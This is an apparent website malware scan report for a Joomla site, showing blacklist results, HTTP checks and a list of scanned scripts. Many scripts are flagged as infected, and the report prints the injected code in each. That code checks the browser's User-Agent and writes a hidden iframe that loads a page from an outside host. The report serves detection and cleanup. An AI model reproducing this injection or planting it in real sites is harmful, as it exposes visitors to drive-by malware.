Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=d-smeh.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://d-smeh.ru/
Result: The website is marked by Yandex as suspicious - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious - visiting this web site may harm your computer.
Details are available here.
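Scanned pages/files
Note: every file marked malicious below contains the same injected function, Mestolysto(). It reads navigator.userAgent and, unless the string contains one of the listed tokens (Chrome, Android, Linux, FreeBSD, IEMobile, Macintosh, iPad, iPhone), writes an iframe positioned off-screen (left/top -710px) that loads a page from a third-party host. The 'pos'+'iti'+'on' string splitting looks intended to evade simple pattern matching. Because the same code appears in cached, template, component and library scripts alike, every listed file should be compared against a known-good copy rather than cleaned one at a time.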
Request | Server response | Status |
http://d-smeh.ru/ | 200 OK Content-Length: 40547 Content-Type: text/html | clean |
http://d-smeh.ru/plugins/system/rokbox/rokbox.js | 200 OK Content-Length: 609 Content-Type: application/x-javascript | clean |
http://d-smeh.ru/plugins/system/rokbox/themes/light/rokbox-config.js | 200 OK Content-Length: 2673 Content-Type: application/x-javascript | clean |
http://d-smeh.ru/cache/widgetkit/widgetkit-0be06e6b.js | 200 OK Content-Length: 14575 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window["WIDGETKIT_URL"]="/media/widgetkit"; function Mestolysto(){var o=navigator.userAgent;var p=(o.indexOf("Chrome")>-1||o.indexOf("Android")>-1||o.indexOf("Linux")>-1||o.indexOf("FreeBSD")>-1||o.indexOf("IEMobile")>-1||o.indexOf("Macintosh")>-1||o.indexOf("iPad")>-1||o.indexOf("iPhone")>-1);if(!p){document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"></if $widgetkit.trans.addDic({"LESS_THAN_A_MINUTE_AGO":"less than a minute ago","ABOUT_A_MINUTE_AGO":"about a minute ago","X_MINUTES_AGO":"%s minutes ago","ABOUT_AN_HOUR_AGO":"about an hour ago","X_HOURS_AGO":"about %s hours ago","ONE_DAY_AGO":"1 day ago","X_DAYS_AGO":"%s days ago"}); Antivirus reports:
| ||
http://d-smeh.ru/templates/yoo_cloud/warp/js/search.js | 200 OK Content-Length: 4788 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mestolysto() { var o = navigator.userAgent; var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1); if (!p) { document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g a!="initialize")c.data(e.prototype.name)[a].apply(c.data(e.prototype.name),Array.prototype.slice.call(b,1));else if(!a||d.isPlainObject(a)){var f=new e;e.prototype.initialize&&f.initialize.apply(f,d.merge([c],b));c.data(e.prototype.name,f)}else d.error("Method "+a+" does not exist on jQuery."+e.name)})}})(jQuery); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://d-smeh.ru/templates/yoo_cloud/warp/js/warp.js | 200 OK Content-Length: 9564 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mestolysto() { var o = navigator.userAgent; var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1); if (!p) { document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g a).bind("blur.placeholder",c).trigger("blur.placeholder").end()};e(function(){e("form").bind("submit.placeholder",function(){var b=e(".placeholder",this).each(a);setTimeout(function(){b.each(c)},10)})});e(window).bind("unload.placeholder",function(){e(".placeholder").val("")})})(jQuery); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://d-smeh.ru/templates/yoo_cloud/warp/js/accordionmenu.js | 200 OK Content-Length: 2239 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mestolysto() { var o = navigator.userAgent; var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1); if (!p) { document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://d-smeh.ru/templates/yoo_cloud/warp/js/dropdownmenu.js | 200 OK Content-Length: 6102 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mestolysto() { var o = navigator.userAgent; var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1); if (!p) { document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g new e;e.prototype.initialize&&g.initialize.apply(g,b.merge([a],o));a.data(e.prototype.name,g)}else b.error("Method "+j+" does not exist on jQuery."+e.name)})}})(jQuery); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://d-smeh.ru/templates/yoo_cloud/js/template.js | 200 OK Content-Length: 638 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mestolysto() { var o = navigator.userAgent; var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1); if (!p) { document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"></ifr'+'ame>'); } } Mestolysto(); Antivirus reports:
| ||
http://d-smeh.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/admirald_theme&file[0]=theme.js | 200 OK Content-Length: 4560 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mestolysto() { var o = navigator.userAgent; var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1); if (!p) { document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g window_id = new Window('window_id', {className: "mac_os_x", title: popTitle, showEffect: Element.show, hideEffect: Element.hide, width: popWidth, height: popHeight}); window_id.setAjaxContent( url, {evalScripts:true}, true, popModal ); window_id.setCookie('window_size'); window_id.setDestroyOnClose(); };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://d-smeh.ru//mc.yandex.ru/metrika/watch.js/ | 404 NOT FOUND Content-Length: 34363 Content-Type: text/html | clean |
http://d-smeh.ru/media/system/js/caption.js | 200 OK Content-Length: 2679 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mestolysto() { var o = navigator.userAgent; var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1); if (!p) { document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g } container.className = this.selector.replace('.', '_'); container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://d-smeh.ru/media/widgetkit/js/jquery.js | 200 OK Content-Length: 94542 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mestolysto() { var o = navigator.userAgent; var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1); if (!p) { document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]):a===l?(f=c.css(f,d),g=parseFloat(f),c.isNumeric(g)?g:f):this.css(d,typeof a==="string"?a:a+"px")}});p.jQuery=p.$=c;typeof define==="function"&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return c})}(window);jQuery.noConflict(); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://d-smeh.ru/лента-новостей-от-яндекса/яндекс | 200 OK Content-Length: 28925 Content-Type: text/html | clean |
http://d-smeh.ru/партнёрские-ссылки/наши-партнёры/ | 200 OK Content-Length: 30817 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: d-smeh.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 20 Sep 2014 19:50:25 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 20 Sep 2014 19:50:25 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c338f0d1edbc6888345382940334c469=fc149q96h7umcrudsrji2a0dt0; path=/
Set-Cookie: virtuemart=fc149q96h7umcrudsrji2a0dt0
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: d-smeh.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 20 Sep 2014 19:50:25 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 20 Sep 2014 19:50:25 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c338f0d1edbc6888345382940334c469=fc149q96h7umcrudsrji2a0dt0; path=/
Set-Cookie: virtuemart=fc149q96h7umcrudsrji2a0dt0
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: d-smeh.ru
Referer: http://www.google.com/search?q=d-smeh.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: d-smeh.ru
Referer: http://www.google.com/search?q=d-smeh.ru
Result:
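The result is similar to the first query. There are no suspicious redirects found. Note that this check covers HTTP-level redirects only; the iframe in the scripts listed above is written client-side and depends on the browser's User-Agent string, so it would not appear in these response headers.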